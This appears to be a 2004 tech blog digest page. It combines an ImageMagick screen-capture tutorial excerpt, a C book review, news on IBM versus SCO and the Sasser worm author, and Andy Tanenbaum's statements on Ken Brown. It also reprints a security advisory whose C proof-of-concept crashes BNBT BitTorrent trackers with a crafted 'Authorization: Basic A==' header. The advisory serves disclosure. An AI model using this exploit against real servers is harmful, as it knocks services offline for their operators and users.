montage -fill yellow 	-draw 'Rectangle 80,250 400,400' 	-fill black -pointsize 20 	-draw 'text 100,300 "@instruction1.txt"' 	-geometry 920x630 capture1.miff capture1a.miff

Remember that you read the switches from left to right. Why? Because each
set of options can be changed by the next option to its right. You won't be
able to see the words in this next example because the yellow box covers them,
as drawing text occurs before drawing the colored box:
montage -fill black -pointsize 20 	-draw 'text 100,300 "@instruction1.txt"' 	-fill yellow -draw 'Rectangle 80,250 400,400' 	-geometry 920x630 capture1.miff capture1a.miff

By the way, did you notice the @instruction1.txt? The
@ token instructs the utility to place the contents of a text
file, instruction1.txt in this case, into the image.

Screen Capture Tips

The best way to figure out what looks good is by experimentation. Here are
a few things I've learned that may save you some time.
  • The more instructions and options on the import command, the longer the capture will take.

  • Do the screen captures using the MIFF file format. Capturing to any other format can slow down the capture process.

  • The screen-shot capture rate depends on the window size.

  • Listen to the beeps; this will give you an idea how quickly or slowly you should navigate through your window.

  • Use the root flag to capture the entire screen of your desktop:
    import -window root capture.miff

  • Identify and rehearse the steps that you want to record. This is known as a
    making a storyboard. The
    screen-capturing process will save every action, good and bad, so practice the
    steps before invoking the bash script.

  • Inserting a sleep command inside of the bash script can give you
    much-needed time to prepare the application for the next screen shot without
    feeling rushed.

  • Reviewing each shot after capture helps identify the good and bad images.
    Simplify this tedious operation by using display to load and edit
    an entire series of images with one command.

  • You may have noticed that listing files with numbers doesn't always sort
    the way you want. Here's a shell trick to ensure that the files are never out
    of sequence:
    display capture?.miff capture??.miff

  • Clicking once on a displayed image will put the ImageMagick program into
    editing mode, and clicking the image again will make the menu disappear. The
    editing tools have many of the same options that are available on the command
    line. Pressing the space bar advances to the next image.

  • Improve the flow of your presentation by adjusting the speed and duration
    of the frame rates of your animation. You can do this while converting the
    individual images.

  • Add comments and special effects to the images only after you've
    established their respective animation frame rates. Make a backup of your
    animation first.

About the Demo

Either download the demo or run it directly from your browser using
animate. You can also convert it into another file format to
better suit your hardware. Be patient. MNG files must be first uncompressed
and then cycled once before they will behave properly; this can take up to a
minute. However, if you convert it to a GIF, the file will larger, but it will respond
instantly in the browser. Converting the file to an MPEG permits play with any
multimedia application, such as mplayer, without any startup time
Developing the small screen-capture movie
for this article made it painfully obvious to me that you should exercise
discretion when choosing your file format. I experimented with GIFs, MPGs, and
MNGs. For example, the resulting uncompressed GIF was 14MB. (ImageMagick
binaries do not use the proprietary compression algorithm unless you enable
that option and recompile.) The MPG was 4.6MB. The MNG was the smallest at
500K. The fancy screen-capture demo was substantially
larger, with the GIF at 26MB, the MPG at 6.7MB, and the MNG again the smallest
at 4.7MB. However it was interesting to note that converting the fancy movie
MNG to PCX files and then converting it back reduced the size to 1.6MB, 65%
The MNG format is clearly superior to GIF, but it is not very well
supported, and takes quite a long time to decompress before it's ready to play.
Mozilla's MNG plug-in failed to bring up the small demo. The ImageMagick
utility animate worked fine. KDE's Konqueror could only run the
small demo, where an HTML tag embedded the MNG file with the
<src> tag.
The GIF version of the demos played well in animate, Mozilla,
and Konqueror.
Another factor to consider is that files such as GIF and MNG don't really
"stream," so players need to load the entire file into RAM before you can see
it. Large graphics may consume too much RAM, crashing your application. One
easy solution is to enlarge the virtual memory by using a swap file. This issue
may also come up when using convert.
MPG is a good choice when resources are at a premium and it's not possible
to add a swap file. You may need to experiment with the convert options
to prevent color loss, though.
animate is good because the presentation is so exact and easy
to control. Viewing GIF format guarantees that any browser can read it fast. Beware,
though -- both of these formats are RAM hungry.


ImageMagick is a very sophisticated graphics manipulation package. This
article has covered only its barest capabilities. Anybody who decides to use
it as a development platform can increase his or her productivity by using
scripts. ImageMagick has an API with a complete set of language bindings for over 16 languages,
including Perl, Java, C, C++, and Cold Fusion.
For those who follow the articles of a certain FreeBSD girl, you can also
do some very interesting things such as Hide Secrets with Steganography inside of your movie.
Several Linux multimedia development applications are available. Many of them have taken inspiration from ImageMagick.


Robert Bernier
currently teaches multimedia technologies in the journalism department at Algonquin College in Ottawa, and works as system and network administrator at a local startup company.

My rating on this article is 7/10

Although this article gives you a step by step aproch on how to capture a simple movie of the actions you are taking i have had very limited luck with this method. When i used windows there was a program called camfiesta that was much more sperior to this method. It is however a first time that such thing has been discussed for linux and I belive there would be plenty of how-to-s as well as programs from where that came from.

ARTICLE: IBM slams 'grandiose' SCO, asks for whole farce to be called off

IBM has filed new documents in its legal dispute with the SCO Group, accusing SCO of having no evidence to back up its copyright infringement claims and asking the judge to throw a major component of the case out of court.
"For more than a year, SCO has made far-reaching claims about its right to preclude IBM's (and everyone else's) Linux activities," wrote IBM in documents filed with the District Court for Utah. "Despite SCO's grandiose descriptions of its alleged evidence of IBM's infringement, SCO now effectively concedes that it has none."
SCO has been unable to provide any evidence of copyright infringement during the discovery phase of the trial and the court should therefore render a summary judgement against SCO, IBM's filings say.
In March 2003, SCO filed a multibillion dollar lawsuit against IBM, accusing it of violating SCO's Unix intellectual property. SCO accused IBM of unfair competition, breach of contract, and of violating SCO's trade secrets. In late February this year, it dropped the trade secret allegations in the case, but added a claim that IBM had violated SCO's Unix copyright.
A few weeks after the trade secret claims were dropped, IBM sought a declaratory judgement in the case, a move that opened the possibility of a quick ruling against SCO. Lawyers following the dispute saw this as a sign of growing confidence on IBM's part.
By seeking a declaratory judgement, IBM was showing that it had not found any evidence to back up SCO's claims, said Jeff Norman, an intellectual property partner with the Chicago law firm Kirkland Ellis. Because the copyright claims form the crux of SCO's case, this week's filing for a summary judgement creates the possibility that the dispute could essentially be over in a matter of months, he said.
"IBM is saying to SCO: 'As a matter of law you're playing this so weak that no reasonable jury could find in your favor'," Norman said. "They must think that they have a pretty good chance of winning the motion, or you wouldn't bring it."
This week's filings could also force SCO to provide more compelling evidence of copyright violations, said David Byer, a partner with the patent and intellectual property group at Boston's Testa, Hurwitz & Thibeault. "It is another way to try to focus the court on the evidentiary questions that have been battled about since day one, meaning who is going to produce what when," he said. "SCO needs to respond to this. If they don't respond appropriately, the case can get thrown out."
SCO is likely to produce more evidence to support its claims, said Blake Stowell, an SCO spokesman. On 19 April, IBM turned over 232 versions of its AIX and Dynix Unix source code as well as internal documents and memos from executives, he said. "Our lawyers are still going through much of the evidence IBM turned over as part of the discovery process. I'm confident that there is still other evidence that will come forward in order for us to be able to prove those claims," Stowell said.
Complicating matters for SCO is the fact that Linux vendor Novell also claims to own copyright to the Unix source code. SCO has sued Novell for slander in connection with this claim.

Friday, May 21, 2004

--[ Book Review: Sams Teach Yourself C in 21 Days, 6th edition

By: Bradley Jones and Peter Aitken

# Paperback: 960 pages ; Dimensions (in inches): 2.12 x 9.06 x 7.38
# Publisher: SAMS; 6th edition (September 25, 2002)
# ISBN: 0672324482

This book was another great build and I thought gave me a better understanding of some of the dull spots that I did not get form the C primer plus. The book is well planned out and has a great structure, there is 21 chapters(days) total about C and an extra 7 chapters about some other languages basic on C (java, c#, and C++). The following are the list of the C chapters:

# Day 1 - Getting Started with C
# Day 2 - The Components of a C Program
# Day 3 - Storing Data: Variables and Constants
# Day 4 - Statements, Expressions, and Operators
# Day 5 - Functions: The Basics
# Day 6 - Basic Program Control
# Day 7 - Fundamentals of Input and Output
# Day 8 - Using Numeric Arrays
# Day 9 - Understanding Pointers
# Day 10 - Characters and Strings
# Day 11 - Structures
# Day 12 - Understanding Variable Scope
# Day 13 - Advanced Program Control
# Day 14 - Working with the Screen, Printer, and Keyboard
# Day 15 - Pointers: Beyond the Basics
# Day 16 - Using Disk Files
# Day 17 - Manipulating Strings
# Day 18 - Getting More from Functions
# Day 19 - Exploring the C Function Library
# Day 20 - Working with Memory
# Day 21 - Advanced Compiler Use

As you see the book will take you from a newbie programmer to an intermediate. There are however many dynasties to this book, there are many typos that I was able to spot, and there are no answers to some of the questions. Another thing that is lacking in the book is that it does not have any reference to the C99 standard which means it does not adhere to the most recent standard published. I really enjoyed doing the Bug Busters section of the book and would like to have many more in the next editions of the book.
The book is 960 pages long but day 21 ends at page 626, the following 7 bonus chapters span from page 627 to page 781, then the appendixes go from page 783 to 893. The book is very easy to read and should take you about 5 days to read if you really want to learn fast, or you could go the slow pace of the book and learn it in 21 days. Of course it is actually ridiculous to actually believe that you are going to learn the language in just 21 days so the title is a little bit a lie, although you will gain understanding about some of the language features, still this is not the whole.

My rating on this book is 8/10

Other reviews done on the book by others:
ACCU Review: Teach Yourself C Programming in 21 Days by Peter Aitkin & Bradley Jones
Barns and Noble

Teach Yourself Programming in Ten Years

ARTICLE: Mitnick: feel foolish if Sasser hit you

Bill Goodwin
Teenage hackers shame IT industry again
Schoolboy Sven Jaschan has been arrested for releasing the Sasser worm, but law agencies are clueless as to how to stop many others like him perpetrating the same crime
The arrest of an 18-year-old schoolboy accused of unleashing Sasser and a series of 28 Netsky worms was both a relief and source of frustration for IT professionals.
Despite years of heavy spending on IT security, it is clear that stereotypical teenage hackers can still cause expense and embarrassment to business IT users.
The Sasser worm, which exploited a vulnerability in Micro-soft Windows, hit high-profile targets, including the UK Coastguard Service, British Airways and American Express and thousands of small businesses.
Variants of the Netsky worm are still creating serious difficulties for unprotected computer systems months after they were first released.
The arrest of Sven Jaschan at his mother's home in Waffensen, Germany, followed an international investigation. But his swift apprehension has left companies and law enforcement agencies wondering whether anything can be done to deter youngsters from being drawn to computer crime.
Last week, police started analysing computer equipment seized from Jaschan and a network of friends around his home town, who are believed to have collaborated to develop and distribute the worms.
"He was caught by his ego and partly his arrogance," said one investigator involved in the case. "Virus writers are motivated by boredom and a desire to appear to have some impact or significance on the world and they do it to get the rush of seeing their code listed on the anti-virus top 10."
His arrest followed a tip-off from acquaintances who were anxious to share the £250,000 bounty offered by Microsoft.
Jaschan bears all the hallmarks of a typical virus writer. He was shy and withdrawn with only one passionate interest: computers. He was studying informatics at school and hoped to go on to study computing at university.
Like many virus writers, Jaschan was probably motivated by a need for recognition, said David Wall, professor of criminal justice and information technology at Leeds University.
"The common thread among many hackers is introversion, a will to be linked to the world and to show the world they are there, while being shy when it comes to face-to-face contact," he said. "For many it is a question of esteem. They sparkle on the internet where they cannot in real life."
Graham Cluley, chief virus technologist at Sophos, said, "It is about showing off to friends and computer geeks. There are criminal writers, but it is more likely this guy was doing it to feel cool."
The need for intellectual challenge was probably another driving force for Jaschan.
"Virus writers have imaginations that lend themselves to complex mathematical problems. Like a lot of deviant activities, part of their appeal is being able to do something that is not condoned by others," said Wall.
Businesses and the police have long tried to find ways to prevent children turning into computer criminals. The National Hi-Tech Crime Unit said it was in talks with the Home Office about educating young people in responsible computer use in schools.
"Children need to be educated from an early age on how to look after themselves online. That is one of the best ways to educate them to protect others," said Philip Virgo, director of Eurim, the industry parliamentary group.
"Teenagers writing worms is rather akin to teenagers playing arson games. Teaching children not to play with matches is a good idea, but it is no substitute for removing the vulnerabilities."
Mitnick: feel foolish if Sasser hit you
Virus writers come low down in the pecking order of computer hackers, said Kevin Mitnick, once the world's most notorious hacker.
In an interview with Computer Weekly, Mitnick, now working as a computer security consultant and author, said Sven Jaschan's technical skills were nothing special. He was amazed that so many businesses fell victim to a worm that in his view was relatively easy to prevent.
"He was no great technical expert. There was a published vulnerability and he took his worm and used his exploit code to be able to propagate it in the many systems that Sasser touched," he said.
Businesses should feel embarrassed if the worm hit them, Mitnick said. "Companies should have known better - you don't leave port 445 open to a hostile network. It is foolish."
Mitnick said he understood Jaschan's obsession with computers. "I was a computer enthusiast myself and I spent the great majority of my time hacking."
Jaschan's arrest and police raids on his collaborators are unlikely to deter youngsters in the future, he added. "People doing this stuff do not assess the risk of being caught. They operate under the illusion of vulnerability."

Original article: http://www.computerweekly.com/articles/article.asp?liArticleID=130593&liArticleTypeID=20&liCategoryID=2&liChannelID=22&liFlavourID=1&sSearch=&nPage=1

SP Research Labs Advisory x12

BNBT BitTorrent Tracker Denial Of Service

Beta 7.5 Release 2 and prior versions


Date Released - 5.21.2004

Product Description from the vendor:

BNBT was written by Trevor Hogan. BNBT is a complete port of the original Python BitTorrent tracker to
C++ for speed and efficiency. BNBT also offers many additional features beyond the original Python
BitTorrent tracker, plus it's easy to use and customizable. BNBT is covered under the GNU Lesser
General Public License (LGPL).


A specifically crafted HTTP GET request which contains 'Authorization: Basic A==' will cause the BNBT
server to crash. It may be possible to execute arbitrary code. Previous versions are also affected by
this vulnerability. The bug is located in util.cpp in the Util_DecodeHTTPAuth function.


Attached to this advisory is very basic PoC code which only causes the BNBT server to crash.

Tested on:
WindowsXP SP1

peace out,


PoC to crash the server

/* BNBT BitTorrent Tracker Denial Of Service

Beta 7.5 Release 2 and prior versions


The bug is located in util.cpp in the Util_DecodeHTTPAuth function.

Coded and Discovered by:
.:sp research labs:.

This PoC will only DoS the server to verify if it is vulnerable.


#pragma comment(lib, "ws2_32.lib")

char exploit[] =

"GET / HTTP/1.0\r\n"
"Authorization: Basic A==\r\n\r\n";

int main(int argc, char *argv[])
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET mysocket;

if (argc < 2)
printf("BNBT BitTorrent Tracker DoS by badpack3t\r\n \r\n\r\n", argv[0]);
printf("Usage:\r\n %s [targetport] (default is 6969)\r\n\r\n", argv[0]);
printf("www.security-protocols.com\r\n\r\n", argv[0]);

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];
port = 6969;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

mysocket = socket(AF_INET, SOCK_STREAM, 0);
printf("Socket error!\r\n");

printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(target)) == NULL)
printf("Resolve of %s failed\n", argv[1]);

memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
printf("Couldn't connect to host.\n");

printf("Sending Payload...\n");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
printf("Error Sending the Exploit Payload\r\n");

printf("Payload has been sent! Check if the webserver is dead.\r\n");
return 0;

Ken Brown's Motivation, Release 1.2


On 20 May 2004, I posted a statement refuting the claim of Ken Brown, President of the Alexis de Tocqueville Institution, that Linus Torvalds didn't write Linux. My statement was mentioned on Slashdot, Groklaw, and many other Internet news sites. This attention resulted in over 150,000 requests to our server in less than a day, which is still standing despite yesterday being a national holiday with no one there to stand next to it saying "You can do it. You can do it." Kudos to Sun Microsystems and the folks who built Apache. My statement was mirrored all over the Internet, so the number of true hits to it is probably a substantial multiple of that. There were also quite a few comments at Slashdot, Groklaw, and other sites, many of them about me. I had never engaged in remote multishrink psychoanalysis on this scale before, so it was a fascinating experience.
The Brown Book

I got an advance copy of Ken Brown's book. I think it is still under embargo, so I won't comment on it. Although I am not an investigative reporter, even I know it is unethical to discuss publications still under embargo. Some of us take ethics more seriously than others. So I won't even reveal the title. Let's call it The Brown Book. There is some precedent for nicknaming books after colors: The International Standard for the CD-ROM (IS 10149) is usually called The Red Book.

Suffice it to say, there is a great deal to criticize in the book. I am sure that will happen when it is published. I may even help out.

Brown's Motivation

What prompted me to write this note today is an email I got yesterday. Actually, I got quite a few :-) , most of them thanking me for the historical material. One of yesterday's emails was from Linus, in response to an email from me apologizing for not letting him see my statement in advance. As a matter of courtesy, I did try but I was using his old transmeta.com address and didn't know his new one until I got a very kind email from Linus' father, a Finnish journalist.

In his email, Linus said that Brown never contacted him. No email, no phone call, no personal interview. Nothing. Considering the fact that Brown was writing an explosive book in which he accused Linus of not being the author of Linux, you would think a serious author would at least confront the subject with the accusation and give him a chance to respond. What kind of a reporter talks to people on the periphery of the subject but fails to talk to the main player?

Why did Brown fly all the way to Europe to interview me and (and according to an email I got from his seat-mate on the plane) one other person in Scandinavia, at considerable expense, and not at least call Linus? Even if he made a really bad choice of phone company, how much could that cost? Maybe a dollar? I call the U.S. all the time from Amsterdam. It is less than 5 cents a minute. How much could it cost to call California from D.C.?

From reading all the comments posted yesterday, I am now beginning to get the picture. Apparently a lot of people (still) think that I 'hate' Linus for stealing all my glory (see below for more on this). I didn't realize this view was so widespread. I now suspect that Brown believed this, too, and thought that I would be happy to dump all over Linus to get 'revenge.' By flying to Amsterdam he thought he could dig up dirt on Linus and get me to speak evil of him. He thought I would back up his crazy claim that Linus stole Linux from me. Brown was wrong on two counts. First, I bear no 'grudge' against Linus at all. He wrote Linux himself and deserves the credit. Second, I am really not a mean person. Even if I were still angry with him after all these years, I wouldn't choose some sleazy author with a hidden agenda as my vehicle. My home page gets 2500 hits a week. If I had something to say, I could put it there.

When The Brown Book comes out, there will no doubt be a lot of publicity in the mainstream media. Any of you with contacts in the media are actively encouraged to point reporters to this page and my original statement to provide some balance. I really think Brown's motivation should come under scrutiny. I don't believe for a nanosecond that Brown was trying to do a legitimate study of IP and open source or anything like that. I think he was trying to make the case the people funding him (which he refused to disclose to me despite my asking point blank) wanted to have made. Having an institution with an illustrious-sounding name make the case looks better than having an interested party make the case.
Clearing Up Some Misconceptions

I would like to close by clearing up a few misconceptions and also correcting a couple of errors. First, I REALLY am not angry with Linus. HONEST. He's not angry with me either. I am not some kind of "sore loser" who feels he has been eclipsed by Linus. MINIX was only a kind of fun hobby for me. I am a professor. I teach and do research and write books and go to conferences and do things professors do. I like my job and my students and my university. If you want to get a masters there, see my home page for information. I wrote MINIX because I wanted my students to have hands-on experience playing with an operating system. After AT&T forbid teaching from John Lions book, I decided to write a UNIX-like system for my students to play with. Since I had already written two books at this point, one on computer architecture and one on computer networks, it seemed reasonable to describe the system in a new book on operating systems, which is what I did. I was not trying to replace GNU/HURD or Berkeley UNIX. Heaven knows, I have said this enough times. I just wanted to show my students and other students how you could write a UNIX-like system using modern technology. A lot of other people wanted a free production UNIX with lots of bells and whistles and wanted to convert MINIX into that. I was dragged along in the maelstrom for a while, but when Linux came along, I was actually relieved that I could go back to professoring. I never really applied for the position of King of the Hackers and didn't want the job when it was offered. Linus seems to be doing excellent work and I wish him much success in the future.

While writing MINIX was fun, I don't really regard it as the most important thing I have ever done. It was more of a distraction than anything else. The most important thing I have done is produce a number of incredibly good students, especially Ph.D. students. See my home page for the list. They have done great things. I am as proud as a mother hen. To the extent that Linus can be counted as my student, I'm proud of him, too. Professors like it when their students go on to greater glory. I have also written over 100 published research papers and 14 books which have been translated into about 20 languages. As a result I have become a Fellow of the IEEE, a Fellow of the ACM, and won numerous other awards. For me, these are the things that really count. If MINIX had become a big 'commercial' success I wouldn't have had the time to do all this academic stuff that I am actually more interested in.
Microkernels Revisited

I can't resist saying a few words about microkernels. A microkernel is a very small kernel. If the file system runs inside the kernel, it is NOT a microkernel. The microkernel should handle low-level process management, scheduling, interprocess communication, interrupt handling, and the basics of memory management and little else. The core microkernel of MINIX 1.0 was under 1400 lines of C and assembler. To that you have to add the headers and device drivers, but the totality of everything that ran in kernel mode was under 5000 lines. Microsoft claimed that Windows NT 3.51 was a microkernel. It wasn't. It wasn't even close. Even they dropped the claim with NT 4.0. Some microkernels have been quite successful, such as QNX and L4. I can't for the life of me see why people object to the 20% performance hit a microkernel might give you when they program in languages like Java and Perl where you often get a factor 20x performance hit. What's the big deal about turning a 3.0 GHz PC into a 2.4 GHz PC due to a microkernel? Surely you once bought a machine appreciably slower than 2.4 GHz and were very happy with it. I would easily give up 20% in performance for a system that was robust, reliable, and wasn't susceptible to many of the ills we see in today's massive operating systems.

I would now like to correct an error in my original statement. One of the emails I got yesterday clarified the origins of Coherent. It was not written by Bob Swartz. He was CEO of the Mark Williams Company. Three ex-students from the University of Waterloo, Dave Conroy, Randell Howard, and Johann George, did most of the work. Waterloo is in Canada, where they also play baseball I am told, but only after the ice melts and they can't play hockey. It took the Waterloo students something like 6 man-years to produce Coherent, but this included the kernel, the C compiler, the shell, and ALL the utilities. The kernel is only a tiny fraction of the total code, so it may well be that the kernel itself took a man year. It took me three years to write MINIX, but I was only working at it only in the evenings, and I also wrote 400 pages of text describing the code in that time period (also in the evenings). I think a good programmer can write a 12,000 line kernel in a year.

If you have made it this far, thank you for your time. Permission is hereby granted to mirror this web page provided that the original, unmodified version is used.

Andy Tanenbaum, 21 May 2004


Well I had an early start today, had to drop my little sister to school. Any ways there is not much news today except for the usual exploits and such ; ). Happy reading.



Open-source group says no to SCO
Mozzila 1.8 Alpha 1 released download.

Linux News:

AbiWord v2.0.7 Released

uwog writes "While our current development series is bound to be a great success, we have not forgotten our stable releases. Therefore, the AbiWord development team is proud to release AbiWord v2.0.7. This release benefits greatly from the feature freeze currently active on our development series, which means that all our efforts are focussed on fixing bugs; bugs that might be present the stable versions as well.
This release is a bugfix release only, with the addition of a new officially supported build system: MS Visual C++. The changes from 2.0.6 to 2.0.7 include, amongst others:
* Added MSVC6 support
* Fix full-screen mode on Windows
* Fix the incorrect height of the line after an image
* Fix crashers when merging table cells
* ... and a LOT more
The full ChangeLog can be found here. We encourage all users to upgrade to this latest stable release.
If you happen to run into a bug in this release, we would very much appreciate it if you would take some time to file a report in our bug database.
Main site (EU): http://www.abisource.com/download/.
More information
Main site (EU): http://www.abisource.com/.

Fedora Core 2 Review
Interview with Everaldo and Jimmac
Sun Java Desktop System review
PearPC 0.1: Is It A Miracle?
[Mono-list] Is it Mono safe?
20 May 2004: More patents.
Helix Player and RealPlayer 10 for Linux Alpha available!
Is a Whole New Approach to Linux on the Way from MS?
AbiWord v2.0.7 Released
IBM Goes on the Offensive and Asks for Partial Summary Judgment Now
Certification: A First Look at SUSE Certification


Cyber Security News:

Bugtraq: Internet explorer .clsid vulnerability
Bugtraq: [slackware-security] cvs (SSA:2004-140-01)
Symantec Norton AntiVirus Email Header Case Scan Bypass
Honeynet Project's Bug tracking site
Site Redesign proposal for insecure.org
Buffer Overflow books???
Hacker group gets dose of own medicine
Linux Advisory Watch - May 21st 2004
New evidence points to Cisco network hack
Cisco Still Mum On Reported Code Theft


Viruses and Worms

Backdoor.Leniv is a Backdoor Trojan horse that allows unauthorized remote access to an infected computer.
Also Known As: BackDoor-BCZ [McAfee], Backdoor.Leniv [Kaspersky], Troj/Leniv-A [Sophos]
Type: Trojan Horse
Infection Length: 78,848 bytes
Systems Affected: Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
Systems Not Affected: DOS, Linux, Macintosh, Novell Netware, OS/2, UNIX, Windows 3.x

W32.Donk.Q is a worm that spreads through open network shares and attempts to exploit the Microsoft DCOM RPC vulnerability (as described in Microsoft Security Bulletin MS03-026).
The worm can also open a backdoor on an infected computer.
Symantec Security Response has developed a removal tool to clean the infections of W32.Donk.Q.
Also Known As: W32/Sdbot.worm.gen.b [McAfee]
Type: Worm
Infection Length: 68,099 bytes
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
Systems Not Affected: DOS, Linux, Macintosh, OS/2, UNIX
CVE References: CAN-2003-0352

More on the Bobax worms
There's now four different versions of the Bobax worm. All of them are used by spammers and controlled through a handful of websites. Some of the variants now even do bandwidth testing to find the most useful machines for spammers to send their spam from.
Also, later variants in the family spread also through the RPC DCOM hole (135/TCP) in addition of the LSASS hole (445/TCP) - and they fingerprint target systems through UPnP (5000/TCP).

Person who tipped off Microsoft about Sasser author also under suspicion? Sophos comments
17 May 2004
Person who tipped off Microsoft about Sasser author also under suspicion? Sophos comments
According to reports in the German media, the person who gave Microsoft valuable information which lead to the arrest of Sven Jaschan, the suspected author of the Sasser worm, may themselves be under suspicion.
It has been widely reported that the German office of Microsoft was approached on Wednesday 5 May by someone inquiring about whether a cash award was available for information leading to the capture of Sasser's author. According to Microsoft $250,000 was duly offered.
As well as Sven Jaschan, five other students at Jaschan's college are also being investigated. According to the German-language Focus news magazine, one of these five students was involved in passing information to Microsoft about Jaschan, and is now being investigated concerning computer sabotage.
Speaking of the five students who have been questioned and had their houses raided and computer systems examined, the public prosecutor's spokesman Detlev Dyballa was reported as saying: "I cannot rule out that these include the person who has tipped off Microsoft about the author of Sasser."
The person suspected of informing Microsoft has been reportedly named only as "Marle B". Dyballa refused to give more detailed information as the investigation continues.
Microsoft spokesman Thomas Baumgärtner has said that the software giant will not hand out a reward to those involved in the crime: "If they were involved in the Sasser case, they won't get anything".
"Mystery continues to surround the identity of the Sasser informants, and security experts have publicly speculated that maybe they are involved in the computer underground," said Graham Cluley, senior technology consultant for Sophos. "If Sven Jaschan's identity as the author of Sasser was revealed by one of his fellow students then it's possible there was a violent disagreement between those engaged in spreading the viruses."

Hackers spread virus, force shutdown of Gaston County e-mails
Sasser fan club stops rattling tin
Person who tipped off Microsoft about Sasser author also under suspicion? Sophos comments


Goggle News:

Google Image Ads…
Google Gmail Beta



Worst Explanation From Tech Support?
Examining the Blackout
Blackout Bug Proves Limits of Software Testing
California town for sale on eBay finally sold
Italy approves 'jail for P2P users' law
Blogging at Microsoft Backgrounder
C Programming



Linux News:

Some Notes on the "Who wrote Linux" Kerfuffle, Release 1.4

by Andy Tanenbaum, 20 May 2004

The history of UNIX and its various children and grandchildren has been in the news recently as a result of a book from the Alexis de Tocqueville Institution. Since I was involved in part of this history, I feel I have an obligation to set the record straight and correct some extremely serious errors. But first some background information.

Ken Brown, President of the Alexis de Tocqueville Institution, contacted me in early March. He said he was writing a book on the history of UNIX and would like to interview me. Since I have written 15 books and have been involved in the history of UNIX in several ways, I said I was willing to help out. I have been interviewed by many people for many reasons over the years, and have been on Dutch and US TV and radio and in various newspapers and magazines, so I didn't think too much about it.

Brown flew over to Amsterdam to interview me on 23 March 2004. Apparently I was the only reason for his coming to Europe. The interview got off to a shaky start, roughly paraphrased as follows:
AST: "What's the Alexis de Tocqueville Institution?"
KB: We do public policy work
AST: A think tank, like the Rand Corporation?
KB: Sort of
AST: What does it do?
KB: Issue reports and books
AST: Who funds it?
KB: We have multiple funding sources
AST: Is SCO one of them? Is this about the SCO lawsuit?
KB: We have multiple funding sources
AST: Is Microsoft one of them?
KB: We have multiple funding sources

He was extremely evasive about why he was there and who was funding him. He just kept saying he was just writing a book about the history of UNIX. I asked him what he thought of Peter Salus' book, A Quarter Century of UNIX. He'd never heard of it! I mean, if you are writing a book on the history of UNIX and flying 3000 miles to interview some guy about the subject, wouldn't it make sense to at least go to amazon.com and type "history unix" in the search box, in which case Salus' book is the first hit? For $28 (and free shipping if you play your cards right) you could learn an awful lot about the material and not get any jet lag. As I soon learned, Brown is not the sharpest knife in the drawer, but I was already suspicious. As a long-time author, I know it makes sense to at least be aware of what the competition is. He didn't bother.
UNIX and Me

I didn't think it odd that Brown would want to interview me about the history of UNIX. There are worse people to ask. In the late 1970s and early 1980s, I spent several summers in the UNIX group (Dept. 1127) at Bell Labs. I knew Ken Thompson, Dennis Ritchie, and the rest of the people involved in the development of UNIX. I have stayed at Rob Pike's house and Al Aho's house for extended periods of time. Dennis Ritchie, Steve Johnson, and Peter Weinberger, among others have stayed at my house in Amsterdam. Three of my Ph.D. students have worked in the UNIX group at Bell Labs and one of them is a permanent staff member now.

Oddly enough, when I was at Bell Labs, my interest was not operating systems, although I had written one and published a paper about it (see "Software - Practice & Experience," vol. 2, pp. 109-119, 1973). My interest then was compilers, since I was the chief designer of the the Amsterdam Compiler Kit (see Commun. of the ACM, vol. 26, pp. 654-660, Sept. 1983.). I spent some time there discussing compilers with Steve Johnson, networking with Greg Chesson, writing tools with Lorinda Cherry, and book authoring with Brian Kernighan, among many others. I also became friends with the other "foreigner," there, Bjarne Stroustrup, who would later go on to design and implement C++.

In short, although I had nothing to do with the development of the original UNIX, I knew all the people involved and much of the history quite well. Furthermore, my contact with the UNIX group at Bell Labs was not a secret; I even thanked them all for having me as a summer visitor in the preface to the first edition of my book Computer Networks. Amazingly, Brown knew nothing about any of this. He didn't do his homework before embarking on his little project
MINIX and Me

Years later, I was teaching a course on operating systems and using John Lions' book on UNIX Version 6. When AT&T decided to forbid the teaching of the UNIX internals, I decided to write my own version of UNIX, free of all AT&T code and restrictions, so I could teach from it. My inspiration was not my time at Bell Labs, although the knowledge that one person could write a UNIX-like operating system (Ken Thompson wrote UNICS on a PDP-7) told me it could be done. My real inspiration was an off-hand remark by Butler Lampson in an operating systems course I took from him when I was a Ph.D. student at Berkeley. Lampson had just finished describing the pioneering CTSS operating system and said, in his inimitable way: "Is there anybody here who couldn't write CTSS in a month?" Nobody raised his hand. I concluded that you'd have to be real dumb not to be able to write an operating system in a month. The paper cited above is an operating system I wrote at Berkeley with the help of Bill Benson. It took a lot more than a month, but I am not as smart as Butler. Nobody is.

I set out to write a minimal UNIX clone, MINIX, and did it alone. The code was 100% free of AT&T's intellectual property. The full source code was published in 1987 as the appendix to a book, Operating Systems: Design and Implementation, which later went into a second edition co-authored with Al Woodhull. MINIX 2.0 was even POSIX-conformant. Both editions contained hundreds of pages of text describing the code in great detail. A box of 10 floppy disks containing all the binaries and source code was available separately from Prentice Hall for $69.

While this was not free software in the sense of "free beer" it was free software in the sense of "free speech" since all the source code was available for only slightly more than the manufacturing cost. But even "free speech" is not completely "free"--think about slander, yelling "fire" in a crowded theater, etc. And this was before the Patriot Act, which requires John Ashcroft's written permission before you can open your mouth. Also Remember (if you are old enough) that by 1987, a university educational license for UNIX cost $300, a commercial license for a university cost $28,000, and a commercial license for a company cost a lot more. For the first time, MINIX brought the cost of "UNIX-like" source code down to something a student could afford. Prentice Hall wasn't really interested in selling software. They were interested in selling books, so there was a fairly liberal policy on copying MINIX, but if a company wanted to sell it to make big bucks, PH wanted a royalty. Hence the PH lawyers equipped MINIX with a lot of boilerplate, but there was never any intention of really enforcing this against universities or students. Using the Internet for distributing that much code was not feasible in 1987, even for people with a high-speed (i.e., 1200 bps) modem. When distribution via the Internet became feasible, I convinced Prentice Hall to drop its (extremely modest) commercial ambitions and they gave me 